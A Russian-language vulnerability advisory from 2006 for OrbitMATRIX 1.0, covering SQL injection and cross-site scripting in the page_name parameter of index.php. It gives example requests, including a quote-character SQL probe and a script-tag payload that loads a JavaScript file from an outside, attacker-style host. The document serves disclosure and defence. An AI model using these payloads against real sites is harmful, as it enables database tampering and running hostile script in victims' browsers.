Межсайтовый скриптинг и SQL-инъекция в OrbitMATRIX

Дата публикации:
15.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
2090
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3609
CVE-2006-3614
CVE-2006-3610
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
OrbitMATRIX 1.x
Уязвимые версии: OrbitMATRIX 1.0, возможно более ранние версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "page_name" сценария index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://www.example.com/index.php?page_name=’

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "page_name" сценария index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://www.example.com/index.php?page_name=contact [script%20src=http://www.youfucktard.com/xss.js][/script]

URL производителя: www.orbitcoders.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Orbitmatrix PHP Script v1.0

или введите имя

CAPTCHA